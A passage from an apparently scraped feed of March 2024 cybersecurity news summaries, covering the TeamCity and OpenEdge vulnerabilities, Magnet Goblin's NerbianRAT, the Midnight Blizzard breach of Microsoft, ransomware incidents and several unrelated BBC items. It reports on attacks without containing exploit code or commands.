          There’s another reason to feel confident in the integrity of elections: in countries like the US, different types of voting machines and registration technologies exist. In 2024 there will be national or regional elections in the US, EU, UK, India, Taiwan, South Africa, Mexico and many other countries. Denial-of-Service (DoS): Distributed Denial-of-Service (DDoS) attacks could block voters from accessing key information that would help them to vote, such as the location of their closest polling station, or information on the main candidates.


          10 free cybersecurity guides you might have missed

          ciber
          2024-03-11 https://www.helpnetsecurity.com/2024/03/11/free-cybersecurity-guides/

          This collection of free cybersecurity guides covers a broad range of topics, from resources for developing cybersecurity programs to specific guides for various sectors and organizations. Whether you work for a small business, a large corporation, or a specific industry, these guides provide insights into cybersecurity best practices, strategies to combat threats, and advice for using online services safely. Cybersecurity resource and reference guide This guide compiles U.S. and International resources for developing cybersecurity programs … More

          The post 10 free cybersecurity guides you might have missed appeared first on Help Net Security.


          Autosummary: Guide to Securing Remote Access Software: Authored by CISA, NSA, FBI, MS-ISAC, and INCD, this guide offers insights into prevalent exploitations and their related tactics, techniques, and procedures (TTPs).


          Email security trends in the energy and infrastructure sector

          industry
          2024-03-11 https://www.helpnetsecurity.com/2024/03/11/energy-and-infrastructure-organizations-attacks-video/

          In this Help Net Security video, Mike Britton, CISO at Abnormal Security, discusses how energy and infrastructure organizations face an increased risk of business email compromise and vendor email compromise attacks. According to Abnormal Security data, from February 2023 to July 2023, the average number of BEC weekly attacks was 0.53 per 1,000 mailboxes. BEC attacks increased by 18% in the following six months, reaching a weekly average of 0.63 attacks per 1,000 mailboxes. Business … More

          The post Email security trends in the energy and infrastructure sector appeared first on Help Net Security.




          Advanced AI, analytics, and automation are vital to tackle tech stack complexity

          industry
          2024-03-11 https://www.helpnetsecurity.com/2024/03/11/advanced-ai-analytics-and-automation-are-vital-to-tackle-tech-stack-complexity/

          97% of technology leaders find traditional AIOps models are unable to tackle the data overload, according to Dynatrace. Organizations are drowning in data The research reveals that organizations are continuing to embrace multi-cloud environments and cloud-native architectures to enable rapid transformation and deliver secure innovation. However, despite the speed, scale, and agility enabled by these modern cloud ecosystems, organizations are struggling to manage the explosion of data they create. These research findings underscore the need … More

          The post Advanced AI, analytics, and automation are vital to tackle tech stack complexity appeared first on Help Net Security.


          Autosummary: “By unifying diverse data, retaining its context, and powering analytics and automation with a hypermodal AI that combines multiple techniques, including causal, predictive, and generative AI, teams can unlock a wealth of insights from their data to drive smarter decision-making, intelligent automation, and more efficient ways of working,” Greifeneder concluded.


          Proof-of-Concept Exploit Released for Progress Software OpenEdge Vulnerability

          exploits
          2024-03-11 https://thehackernews.com/2024/03/proof-of-concept-exploit-released-for.html
          Technical specifics and a proof-of-concept (PoC) exploit have been made available for a recently disclosed critical security flaw in Progress Software OpenEdge Authentication Gateway and AdminServer, which could be potentially exploited to bypass authentication protections. Tracked as CVE-2024-1403, the vulnerability has a maximum severity rating of 10.0 on the CVSS scoring system. It



          Magnet Goblin Hacker Group Leveraging 1-Day Exploits to Deploy Nerbian RAT

          exploits
          2024-03-11 https://thehackernews.com/2024/03/magnet-goblin-hacker-group-leveraging-1.html
          A financially motivated threat actor called Magnet Goblin is swiftly adopting one-day security vulnerabilities into its arsenal in order to opportunistically breach edge devices and public-facing services and deploy malware on compromised hosts. “Threat actor group Magnet Goblin’s hallmark is its ability to swiftly leverage newly disclosed vulnerabilities, particularly targeting



          Microsoft: Russian hackers accessed internal systems, code repositories

          rusia-ucrania
          2024-03-11 https://www.helpnetsecurity.com/2024/03/11/microsoft-russian-hackers-srouce-code/

          Midnight Blizzard (aka APT29), a group of Russian hackers tied to the country’s Foreign Intelligence Service (SVR), has leveraged information stolen from Microsoft corporate email systems to burrow into the company’s source code repositories and internal systems. “It is apparent that Midnight Blizzard is attempting to use secrets of different types it has found. Some of these secrets were shared between customers and Microsoft in email, and as we discover them in our exfiltrated email, … More

          The post Microsoft: Russian hackers accessed internal systems, code repositories appeared first on Help Net Security.




          BianLian Threat Actors Exploiting JetBrains TeamCity Flaws in Ransomware Attacks

          exploits government ransomware
          2024-03-11 https://thehackernews.com/2024/03/bianlian-threat-actors-exploiting.html
          The threat actors behind the BianLian ransomware have been observed exploiting security flaws in JetBrains TeamCity software to conduct their extortion-only attacks. According to a new report from GuidePoint Security, which responded to a recent intrusion, the incident "began with the exploitation of a TeamCity server which resulted in the deployment of a PowerShell implementation of

          Autosummary: "After multiple failed attempts to execute their standard Go backdoor, the threat actor pivoted to living-off-the-land and leveraged a PowerShell implementation of their backdoor, which provides an almost identical functionality to what they would have with their Go backdoor," security researchers Justin Timothy, Gabe Renfro, and Keven Murphy said.


          Experts released PoC exploit for critical Progress Software OpenEdge bug

          exploits
          2024-03-11 https://securityaffairs.com/160347/hacking/progress-software-openedge-critical-flaw.html
          Researchers released technical specifics and a PoC exploit for a recently disclosed flaw in Progress Software OpenEdge Authentication Gateway and AdminServer. Researchers from Horizon3.ai have published technical details and a proof-of-concept (PoC) exploit for the critical security flaw CVE-2024-1403 in Progress Software OpenEdge Authentication Gateway and AdminServer. “The Progress OpenEdge team recently identified a security […]

          Autosummary: “Similarly, when an AdminServer connection is made by OpenEdge Explorer (OEE) and OpenEdge Management (OEM), it also utilizes the OS local authentication provider on supported platforms to grant user-id and password logins that may also lead to unauthorized login access.”


          Magnet Goblin group used a new Linux variant of NerbianRAT malware

          exploits Linux
          2024-03-11 https://securityaffairs.com/160274/cyber-crime/magnet-goblin-nerbianrat-attacks.html
          The financially motivated hacking group Magnet Goblin uses various 1-day flaws to deploy custom malware on Windows and Linux systems. A financially motivated threat actor named Magnet Goblin made the headlines for rapidly adopting and exploiting 1-day vulnerabilities, Check Point warned. The group focuses on internet-facing services; in at least one instance the group exploited the […]

          Autosummary: These include:
          - Magento – CVE-2022-24086
          - Qlik Sense – CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365
          - Ivanti Connect Secure – CVE-2023-46805, CVE-2024-21887, CVE-2024-21888 and CVE-2024-21893
          The researchers also observed a simplified version of the NerbianRAT, called MiniNerbian, which supports the following actions:
          - Execute C2’s command and return results
          - Update activity schedule (full day or specific hours)
          - Update configuration
          Unlike NerbianRAT, MiniNerbian uses the HTTP protocol for C2 communication.


          Hackers exploited WordPress Popup Builder plugin flaw to compromise 3,300 sites

          exploits
          2024-03-11 https://securityaffairs.com/160329/hacking/wordpress-popup-builder-plugin-bug.html
          Threat actors are hacking WordPress sites by exploiting a vulnerability, tracked as CVE-2023-6000, in old versions of the Popup Builder plugin. In January, Sucuri researchers reported that Balada Injector malware infected over 7100 WordPress sites using a vulnerable version of the Popup Builder WordPress plugin. Sucuri reported that on December 13th, the Balada Injector campaign started infecting […]

          Autosummary: “These injections serve as handlers for various Popup Builder events such as sgpb-ShouldOpen, sgpb-ShouldClose, sgpb-WillOpen, sgpbDidOpen, sgpbWillClose, sgpb-DidClose.”


          Currys takeover move scrapped by US firm Elliot

          industry
          2024-03-11 https://www.bbc.co.uk/news/business-68532445
          Investment firm Elliot says it will not bid for the retailer after being rejected "multiple times".



          Cynerio extends Healthcare Cybersecurity Platform to improve patient data protections

          ciber
          2024-03-11 https://www.helpnetsecurity.com/2024/03/11/cynerio-healthcare-cybersecurity-platform/

          As data breaches continue to expose sensitive healthcare information, with over 118 million patients impacted in the United States in 2023, Cynerio has extended its commitment to enhancing cybersecurity in the healthcare sector. With a focus on addressing critical cybersecurity challenges, Cynerio expands its Healthcare Cybersecurity Platform to safeguard patient data and combat escalating cyber threats. The four primary areas of focus include: 1. Safeguarding healthcare information with patient data security: Cynerio’s Patient Data Security … More

          The post Cynerio extends Healthcare Cybersecurity Platform to improve patient data protections appeared first on Help Net Security.


          Autosummary: Stopping healthcare-focused cyber attacks with Network Detection + Response: In response to the escalating cyber threats targeting healthcare, Cynerio’s Network Detection + Response technology offers rapid deployment, day-one protections, validation of alerts, and response times measured in seconds.


          New Banking Trojan CHAVECLOAK Targets Brazilian Users via Phishing Tactics

          financial exploits latam industry
          2024-03-11 https://thehackernews.com/2024/03/new-banking-trojan-chavecloak-targets.html
          Users in Brazil are the target of a new banking trojan known as CHAVECLOAK that’s propagated via phishing emails bearing PDF attachments. "This intricate attack involves the PDF downloading a ZIP file and subsequently utilizing DLL side-loading techniques to execute the final malware," Fortinet FortiGuard Labs researcher Cara Lin said. The attack chain involves the use of

          Autosummary: "The malware facilitates various actions to steal a victim’s credentials, such as allowing the operator to block the victim’s screen, log keystrokes, and display deceptive pop-up windows," Lin said.


          BianLian group exploits JetBrains TeamCity bugs in ransomware attacks

          exploits government ransomware
          2024-03-11 https://securityaffairs.com/160357/hacking/bianlian-group-ttack-jetbrains-teamcity.html
          BianLian ransomware group was spotted exploiting vulnerabilities in JetBrains TeamCity software in recent attacks. Researchers from GuidePoint Security noticed, while investigating a recent attack linked to the BianLian ransomware group, that the threat actors gained initial access to the target by exploiting flaws in a TeamCity server. The BianLian ransomware emerged in August 2022, the […]

          Autosummary: BianLian ransomware group was spotted exploiting vulnerabilities in JetBrains TeamCity software in recent attacks.


          Researchers expose Microsoft SCCM misconfigs usable in cyberattacks

          ciber
          2024-03-11 https://www.bleepingcomputer.com/news/security/researchers-expose-microsoft-sccm-misconfigs-usable-in-cyberattacks/
          Security researchers have created a knowledge base repository for attack and defense techniques based on improperly setting up Microsoft’s Configuration Manager, which could allow an attacker to execute payloads or become a domain controller. [...]

          Autosummary: [Figure: Attack matrix for Misconfiguration Manager techniques (source: Duane Michael)] Depending on the environment, the techniques described could allow access to credentials (CRED), elevate privileges (ELEVATE), perform reconnaissance and discovery (RECON), or gain control of the MCM/SCCM hierarchy (TAKEOVER).


          Equilend warns employees their data was stolen by ransomware gang

          exploits ransomware
          2024-03-11 https://www.bleepingcomputer.com/news/security/equilend-warns-employees-their-data-was-stolen-by-ransomware-gang/
          New York-based securities lending platform EquiLend Holdings confirmed in data breach notification letters sent to employees that their data was stolen in a January ransomware attack. [...]



          Massive cyberattacks hit French government agencies

          government ciber
          2024-03-11 https://securityaffairs.com/160374/hacking/massive-cyberattacks-hit-french-government-agencies.html
          A series of “intense” cyberattacks hit multiple French government agencies, revealed the prime minister’s office. “Several ‘intense’ cyberattacks targeted multiple French government agencies since Sunday night, as disclosed by the prime minister’s office.” The French minister’s office did not provide details about the attacks, however, the French agencies were likely hit with distributed denial-of-service (DDoS) […]



          Week in review: Attackers use phishing emails to steal NTLM hashes, Patch Tuesday forecast

          financial
          2024-03-10 https://www.helpnetsecurity.com/2024/03/10/week-in-review-attackers-use-phishing-emails-to-steal-ntlm-hashes-patch-tuesday-forecast/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: What organizations need to know about the Digital Operational Resilience Act (DORA) In this Help Net Security interview, Kris Lovejoy, Global Security and Resilience Leader at Kyndryl, discusses the impact of the Digital Operational Resilience Act (DORA) on organizations across the EU, particularly in ICT risk management and cybersecurity. Leveraging AI and automation for enhanced cloud communication security In this … More

          The post Week in review: Attackers use phishing emails to steal NTLM hashes, Patch Tuesday forecast appeared first on Help Net Security.


          Autosummary: VMware patches critical flaws in ESXi, Workstation, Fusion and Cloud Foundation: VMware has fixed four vulnerabilities (CVE-2024-22252, CVE-2024-22253, CVE-2024-22254, CVE-2024-22255) in ESXi, Workstation, Fusion and Cloud Foundation, some of which could allow attackers to escape the sandbox and execute code on the host machine. Major shifts in identity, ransomware, and critical infrastructure threat trends: In this Help Net Security video, Michelle Alvarez, Strategic Threat Analysis Manager at IBM X-Force, discusses the 2024 X-Force Threat Intelligence Index, revealing top threats and trends the team observed last year across its global engagements and how these shifts are forming the threat landscape in 2024 and beyond.


          Hackers exploit WordPress plugin flaw to infect 3,300 sites with malware

          exploits
          2024-03-10 https://www.bleepingcomputer.com/news/security/hackers-exploit-wordpress-plugin-flaw-to-infect-3-300-sites-with-malware/
          Hackers are breaching WordPress sites by exploiting a vulnerability in outdated versions of the Popup Builder plugin, infecting over 3,300 websites with malicious code. [...]

          Autosummary: The primary function of the injected code is to act as event handlers for various Popup Builder plugin events, such as "sgpb-ShouldOpen", "sgpb-ShouldClose", "sgpb-WillOpen", "sgpbDidOpen", "sgpbWillClose", and "sgpb-DidClose".


          Lithuania security services warn of China’s espionage against the country

          government
          2024-03-10 https://securityaffairs.com/160310/intelligence/cina-espionage-against-lithuania.html
          A report published by Lithuanian security services warned that China has escalated its espionage operations against Lithuania. A report released by Lithuanian security services has cautioned that China has intensified espionage activities targeting Lithuania. Previously, the government of Beijing was interested in information about the ‘five poisons’ (Taiwan, Hong Kong, Tibet, Xinjiang, and Falun Gong) […]

          Autosummary: Persons of interest include individuals who may have direct access to sensitive information or a wide network of contacts, including officials, politicians, journalists, business people, and scientists who can be used as intermediaries in intelligence operations.


          Microsoft Confirms Russian Hackers Stole Source Code, Some Customer Secrets

          rusia-ucrania
          2024-03-09 https://thehackernews.com/2024/03/microsoft-confirms-russian-hackers.html
          Microsoft on Friday revealed that the Kremlin-backed threat actor known as Midnight Blizzard (aka APT29 or Cozy Bear) managed to gain access to some of its source code repositories and internal systems following a hack that came to light in January 2024. "In recent weeks, we have seen evidence that Midnight Blizzard is using information initially exfiltrated from our

          Autosummary: "In recent weeks, we have seen evidence that Midnight Blizzard is using information initially exfiltrated from our corporate email systems to gain, or attempt to gain, unauthorized access," the tech giant said.


          Critical Fortinet FortiOS bug CVE-2024-21762 potentially impacts 150,000 internet-facing devices

          exploits
          2024-03-09 https://securityaffairs.com/160224/hacking/fortios-bug-cve-2024-21762-150k-devices.html
          Researchers warn that the critical vulnerability CVE-2024-21762 in Fortinet FortiOS could potentially impact 150,000 exposed devices. In February, Fortinet warned that the critical remote code execution vulnerability CVE-2024-21762 (CVSS score 9.6) in FortiOS SSL VPN was actively exploited in attacks in the wild. The security firm did not provide details about the attacks exploiting this vulnerability. The issue […]

          Autosummary: Shadowserver (@Shadowserver), March 7, 2024. The majority of vulnerable devices (as of March 9, 2024) are in the United States (24.647), followed by India (7.713) and Brazil (4.934).


          CISA adds JetBrains TeamCity bug to its Known Exploited Vulnerabilities catalog

          exploits government
          2024-03-09 https://securityaffairs.com/160236/security/jetbrains-teamcity-bug-cisa-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a JetBrains TeamCity vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2024-27198 (CVSS Score 9.8) JetBrains TeamCity authentication bypass vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. This week Rapid7 researchers disclosed two new critical security vulnerabilities, tracked as CVE-2024-27198 (CVSS score: […]

          Autosummary: Below are the descriptions for these vulnerabilities: CVE-2024-27198 is an authentication bypass vulnerability in the web component of TeamCity that arises from an alternative path issue (CWE-288) and has a CVSS base score of 9.8 (Critical).


          Magnet Goblin hackers use 1-day flaws to drop custom Linux malware

          exploits Linux
          2024-03-09 https://www.bleepingcomputer.com/news/security/magnet-goblin-hackers-use-1-day-flaws-to-drop-custom-linux-malware/
          A financially motivated hacking group named Magnet Goblin uses various 1-day vulnerabilities to breach public-facing servers and deploy custom malware on Windows and Linux systems. [...]

          Autosummary: Configuration parameters (Source: Check Point). The C2 may send one of the following actions to the malware for execution on the infected system: request more actions; execute a Linux command in a new thread; send the command result and clean the file, stopping any running commands; execute a Linux command immediately; do nothing; modify the connection interval; adjust and save worktime settings; return idle timings, config, or command results; update a specific config variable; refresh the command buffer for C2 execution commands. MiniNerbian is a simplified version of NerbianRAT, primarily used for command execution, and supports the following actions: execute the C2's command and return results; update the activity schedule (full day or specific hours); update the configuration. MiniNerbian communicates with the C2 via HTTP, differentiating it from the more complex NerbianRAT, which uses raw TCP sockets for communication.


          Securing the future: Addressing cybersecurity challenges in the education sector

          ciber
          2024-03-08 https://www.helpnetsecurity.com/2024/03/08/universities-current-threat-environment-video/

          In this Help Net Security video, Kory Daniels, CISO at Trustwave, shines a light on the impact the current threat environment can have for both universities and students. Key findings from a recent Trustwave report include: – 1.8 million devices related to the education industry are being publicly exposed globally – Ransomware attacks remain the dominant source of breaches for the education sector – Threat actors are selling VPN access to universities on the dark … More

          The post Securing the future: Addressing cybersecurity challenges in the education sector appeared first on Help Net Security.


          CISA Warns of Actively Exploited JetBrains TeamCity Vulnerability

          exploits government
          2024-03-08 https://thehackernews.com/2024/03/cisa-warns-of-actively-exploited.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a critical security flaw impacting JetBrains TeamCity On-Premises software to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability, tracked as CVE-2024-27198 (CVSS score: 9.8), refers to an authentication bypass bug that allows for a complete


          Identiv releases bitse.io 3.0, simplifying the deployment of IoT applications

          industry
          2024-03-08 https://www.helpnetsecurity.com/2024/03/08/identiv-bitse-io-3-0/

          Identiv launched bitse.io 3.0, the latest iteration of its global IoT connecting cloud platform. The updated platform offers advanced features designed to transform applications in supply chain management, brand protection, and customer engagement. bitse.io simplifies the deployment of innovative IoT applications, enabling customers to rapidly bring solutions with the latest radio-frequency identification (RFID) and IoT technologies to market. With native support for encrypted and tamper-proof tags based upon the top RFID and IoT chips from … More

          The post Identiv releases bitse.io 3.0, simplifying the deployment of IoT applications appeared first on Help Net Security.


          Cisco Issues Patch for High-Severity VPN Hijacking Bug in Secure Client

          exploits
          2024-03-08 https://thehackernews.com/2024/03/cisco-issues-patch-for-high-severity.html
          Cisco has released patches to address a high-severity security flaw impacting its Secure Client software that could be exploited by a threat actor to open a VPN session with that of a targeted user. The networking equipment company described the vulnerability, tracked as CVE-2024-20337 (CVSS score: 8.2), as allowing an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF


          QEMU Emulator Exploited as Tunneling Tool to Breach Company Network

          exploits
          2024-03-08 https://thehackernews.com/2024/03/cybercriminals-utilize-qemu-emulator-as.html
          Threat actors have been observed leveraging the QEMU open-source hardware emulator as tunneling software during a cyber attack targeting an unnamed "large company" to connect to their infrastructure. While a number of legitimate tunneling tools like Chisel, FRP, ligolo, ngrok, and Plink have been used by adversaries to their advantage, the development marks the first QEMU that has been


          Play ransomware attack on Xplain exposed 65,000 files containing data relevant to the Swiss Federal Administration.

          exploits ransomware
          2024-03-08 https://securityaffairs.com/160174/data-breach/xplain-data-breach-report.html
          The ransomware attack on Xplain impacted tens of thousands of Federal government files, said the National Cyber Security Centre (NCSC) of Switzerland. The National Cyber Security Centre (NCSC) published a data analysis report on the data breach resulting from the ransomware attack on the IT services provider Xplain. The attack took place on May 23, 2023 […]

          Autosummary: Government experts discovered sensitive information, including personal data, technical information, classified details, and passwords, in approximately half of the Federal Administration’s files (5,182). “In addition, 278 files contained technical information such as documentation on IT systems, software requirement documents or architectural descriptions, 121 objects were classified in accordance with the Information Protection Ordinance and 4 objects contained readable passwords.”


          Update now! JetBrains TeamCity vulnerability abused at scale

          exploits government
          2024-03-08 https://www.malwarebytes.com/blog/news/2024/03/update-now-jetbrains-teamcity-vulnerability-abused-at-scale
          Users of JetBrains TeamCity on-premises server need to deal with two serious vulnerabilities.

          Autosummary: The two vulnerabilities are CVE-2024-27198, an authentication bypass vulnerability with a CVSS score of 9.8, and CVE-2024-27199, a path traversal issue with a CVSS score of 7.3.


          Microsoft says Russian hackers breached its systems, accessed source code

          rusia-ucrania
          2024-03-08 https://www.bleepingcomputer.com/news/microsoft/microsoft-says-russian-hackers-breached-its-systems-accessed-source-code/
          Microsoft says the Russian "Midnight Blizzard" hacking group recently accessed some of its internal systems and source code repositories using authentication secrets stolen during a January cyberattack. [...]

          Autosummary: "In recent weeks, we have seen evidence that Midnight Blizzard is using information initially exfiltrated from our corporate email systems to gain, or attempt to gain, unauthorized access," reads a new blog post by the Microsoft Security Response Center.


          Panama footballer makes quit threat after "fat" comment

          latam
          2024-03-08 https://www.bbc.co.uk/sport/football/68515678
          Marta Cox threatens not to play for Panama again after the president of Panama's football federation (FEPAFUT) calls her "fat" and "out of shape".

          Autosummary: Women's Football. Marta Cox has played professionally in Colombia, Costa Rica and Mexico. Marta Cox has threatened not to play for Panama again after the president of Panama's football federation (FEPAFUT) called her "fat" and "out of shape".


          The Week in Ransomware - March 8th 2024 - Waiting for the BlackCat rebrand

          exploits ransomware
          2024-03-08 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-8th-2024-waiting-for-the-blackcat-rebrand/
          We saw another ransomware operation shut down this week after first getting breached by law enforcement and then targeting critical infrastructure, putting them further in the spotlight of the US government. [...]

          Autosummary: Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @Seifreed, @fwosar, @malwrhunterteam, @billtoulas, @BleepinComputer, @LawrenceAbrams, @serghei, @Ionut_Ilascu, @ddd1ms, @uuallan, @AShukuhi, @BrettCallow, @BushidoToken, @JBurnsKoven, @Jon__DiMaggio, @ValeryMarchive, @UK_Daniel_Card, @AlexMartin, @TalosSecurity, @CarlyPage_, and @pcrisk. March 4th 2024: The ALPHV/BlackCat ransomware gang has shut down its servers amid claims that they scammed the affiliate responsible for the attack on Optum, the operator of the Change Healthcare platform, of $22 million. Talos observed the GhostSec and Stormous ransomware groups operating together to conduct several double extortion attacks using the GhostLocker and StormousX ransomware programs against victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand and Indonesia, according to our assessment of the disclosure messages posted by the group in their Telegram channels and the Stormous ransomware data leak site.


          TeamCity auth bypass bug exploited to mass-generate admin accounts

          exploits government
          2024-03-07 https://www.bleepingcomputer.com/news/security/teamcity-auth-bypass-bug-exploited-to-mass-generate-admin-accounts/
          Hackers have started to exploit the critical-severity authentication bypass vulnerability (CVE-2024-27198) in TeamCity On-Premises, which JetBrains addressed in an update on Monday. [...]

          Autosummary: (Figure: TeamCity installations vulnerable to auth bypass bug CVE-2024-27198, source: LeakIX.) Most of the vulnerable hosts indexed by LeakIX are in Germany, the United States, and Russia, followed at a distance by China, the Netherlands, and France.


          Smashing Security podcast #362: Ransomware fraud, pharmacy chaos, and suicide

          exploits ransomware
          2024-03-07 https://grahamcluley.com/smashing-security-podcast-362/
          Is there any truth behind the alleged data breach at Fortnite maker Epic Games? Who launched the ransomware attack that caused a fallout at pharmacies? And what’s the latest on the heart-breaking hack of Finnish therapy clinic Vastaamo? All this and much much more is discussed in the latest edition of the “Smashing Security” podcast …

          Autosummary: Hosts: Graham Cluley (@gcluley), Carole Theriault (@caroletheriault). Guest: Jessica Barker (@drjessicabarker). Sponsored by Kiteworks: step into the future of secure managed file transfer with Kiteworks.


          Major shifts in identity, ransomware, and critical infrastructure threat trends

          exploits ransomware
          2024-03-07 https://www.helpnetsecurity.com/2024/03/07/2024-x-force-threat-intelligence-index-video/

          In this Help Net Security video, Michelle Alvarez, Strategic Threat Analysis Manager at IBM X-Force, discusses the 2024 X-Force Threat Intelligence Index, revealing top threats and trends the team observed last year across its global engagements and how these shifts are forming the threat landscape in 2024 and beyond. X-Force observed shifts toward credential-driven attacks with a 71% increase in attacks caused by using valid accounts. As cybercriminals see more opportunities to “log in” vs. … More

          The post Major shifts in identity, ransomware, and critical infrastructure threat trends appeared first on Help Net Security.


          78% of MSPs identify cybersecurity as prime IT challenge

          ciber
          2024-03-07 https://www.helpnetsecurity.com/2024/03/07/msps-cybersecurity-priority/

          Cybersecurity remained a top priority and an area of growth for MSPs, with 73% saying it’s a top revenue driver for their business, according to Kaseya. Ongoing cyberattack threats impact MSPs The threat of cyberattacks continues to weigh on MSPs and their clients. The report found that a staggering 78% of respondents consider cybersecurity as a top IT challenge, compared to 67% the year prior, and highlighted the importance of businesses continuing to invest in … More

          The post 78% of MSPs identify cybersecurity as prime IT challenge appeared first on Help Net Security.

          Autosummary: “Cybersecurity remains a critical concern for MSPs, driven by two factors: the escalating threat landscape, and the persistent challenge of proving high quality security services across all of their clients,” explained Mike Puglia, GM of Security Products at Kaseya.


          A cybercriminal is sentenced, will it make a difference?

          ciber
          2024-03-07 https://www.helpnetsecurity.com/2024/03/07/shinyhunters-group/

          The darknet is home to many underground hacking forums in which cybercriminals convene, freely sharing stories, tactics, success stories and failures. Their unguarded discussions allow our team to peek into the politics and ethics behind recent adversary activities. The threat intelligence we gather is harnessed to continuously enhance protections for Cynet partners and customers. In this piece, we’ll probe a notorious ransomware gang, ShinyHunters, to shed light on cybercriminal incentives and the objectives they pursue, … More

          The post A cybercriminal is sentenced, will it make a difference? appeared first on Help Net Security.

          Autosummary: Its 700GB of stolen data included: Sensitive ABFRL employee and customer data (full name, email, birth date, physical address, gender, age, marital status, salary, religion, and more). The account data included email addresses, full names and birth dates, as well as hashed user passwords that other threat actors dehashed, or cracked, before sharing publicly. In this piece, we’ll probe a notorious ransomware gang, ShinyHunters, to shed light on cybercriminal incentives and the objectives they pursue, as well as the effects for victims — and steps your team can take to reduce risk.


          Watch Out for Spoofed Zoom, Skype, Google Meet Sites Delivering Malware

          exploits
          2024-03-07 https://thehackernews.com/2024/03/watch-out-for-spoofed-zoom-skype-google.html
          Threat actors have been leveraging fake websites advertising popular video conferencing software such as Google Meet, Skype, and Zoom to deliver a variety of malware targeting both Android and Windows users since December 2023. “The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows

          Autosummary: "A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files," the researchers said.


          CISA adds Apple iOS and iPadOS memory corruption bugs to its Known Exploited Vulnerabilities Catalog

          exploits
          2024-03-07 https://securityaffairs.com/160124/security/cisa-apple-ios-and-ipados-bugs-to-its-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple iOS and iPadOS memory corruption vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: This week, Apple released emergency security updates to address two iOS zero-day vulnerabilities, respectively tracked as CVE-2024-23225 and […]

          Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-23225 (Apple iOS and iPadOS Memory Corruption Vulnerability) and CVE-2024-23296 (Apple iOS and iPadOS Memory Corruption Vulnerability). This week, Apple released emergency security updates to address two iOS zero-day vulnerabilities, respectively tracked as CVE-2024-23225 and CVE-2024-23296, that were exploited in attacks against iPhone devices.


          Linux Malware targets misconfigured Apache Hadoop, Confluence, Docker, and Redis servers

          exploits Linux
          2024-03-07 https://securityaffairs.com/160093/hacking/linux-malware-cryptocurrency-campaign.html
          A new Linux malware campaign is targeting misconfigured Apache Hadoop, Confluence, Docker, and Redis instances. Researchers from Cado Security observed a new Linux malware campaign targeting misconfigured Apache Hadoop, Confluence, Docker, and Redis instances. The threat actors behind this campaign employed previously undetected payloads, including four Golang binaries that are used to automate the […]

          Autosummary: Linux Malware targets misconfigured Apache Hadoop, Confluence, Docker, and Redis servers. Pierluigi Paganini, March 07, 2024. A new Linux malware campaign is targeting misconfigured Apache Hadoop, Confluence, Docker, and Redis instances.


          Critical TeamCity flaw now widely exploited to create admin accounts

          exploits government
          2024-03-07 https://www.bleepingcomputer.com/news/security/critical-teamcity-flaw-now-widely-exploited-to-create-admin-accounts/
          Hackers have started to exploit the critical-severity authentication bypass vulnerability (CVE-2024-27198) in TeamCity On-Premises, which JetBrains addressed in an update on Monday. [...]

          Autosummary: (Figure: TeamCity installations vulnerable to auth bypass bug CVE-2024-27198, source: LeakIX.) Most of the vulnerable hosts indexed by LeakIX are in Germany, the United States, and Russia, followed at a distance by China, the Netherlands, and France.


          Web-based PLC malware: A new potential threat to critical infrastructure

          exploits industry
          2024-03-07 https://www.helpnetsecurity.com/2024/03/07/web-based-plc-malware/

          A group of researchers from Georgia Tech’s College of Engineering have developed web-based programmable logic controller (PLC) malware able to target most PLCs produced by major manufacturers. “Our Web-Based (WB) PLC malware resides in PLC memory, but ultimately gets executed client-side by various browser-equipped devices throughout the ICS environment. From there, the malware uses ambient browser-based credentials to interact with the PLC’s legitimate web APIs to attack the underlying real-world machinery,” the researchers explained. What … More

          The post Web-based PLC malware: A new potential threat to critical infrastructure appeared first on Help Net Security.

          Autosummary: The advantages of web-based PLC malware: PLCs having embedded web servers means that attackers don’t need network or physical access to deliver the malware – they can simply lure an ICS operator to view an attacker-controlled website that exploits a cross-origin resource sharing (CORS) misconfiguration vulnerability to transfer a web page with malicious JavaScript code to the web server.


          Chinese State Hackers Target Tibetans with Supply Chain, Watering Hole Attacks

          government
          2024-03-07 https://thehackernews.com/2024/03/chinese-state-hackers-target-tibetans.html
          The China-linked threat actor known as Evasive Panda orchestrated both watering hole and supply chain attacks targeting Tibetan users at least since September 2023. The end goal of the attacks is to deliver malicious downloaders for Windows and macOS that deploy a known backdoor called MgBot and a previously undocumented Windows implant known as Nightdoor. The findings come from ESET, which

          Autosummary: The executable – named "certificate.exe" on Windows and "certificate.pkg" for macOS – serves as a launchpad for loading the Nightdoor implant, which, subsequently, abuses the Google Drive API for command-and-control (C2).


          AnyCubic fixes exploited 3D printer zero day flaw with new firmware

          exploits
          2024-03-07 https://www.bleepingcomputer.com/news/security/anycubic-fixes-exploited-3d-printer-zero-day-flaw-with-new-firmware/
          AnyCubic has released new Kobra 2 firmware to fix a zero-day vulnerability exploited last month to print security warnings on 3D printers worldwide. [...]

          Autosummary: Implementing network segmentation measures to restrict external access to services; conducting regular audits and updates for systems, software, and the MQTT server. For those uncomfortable with their printers accessing AnyCubic's cloud service, the company has provided steps for turning off the WiFi via the printer screen.


          Switzerland: Play ransomware leaked 65,000 government documents

          exploits government ransomware
          2024-03-07 https://www.bleepingcomputer.com/news/security/switzerland-play-ransomware-leaked-65-000-government-documents/
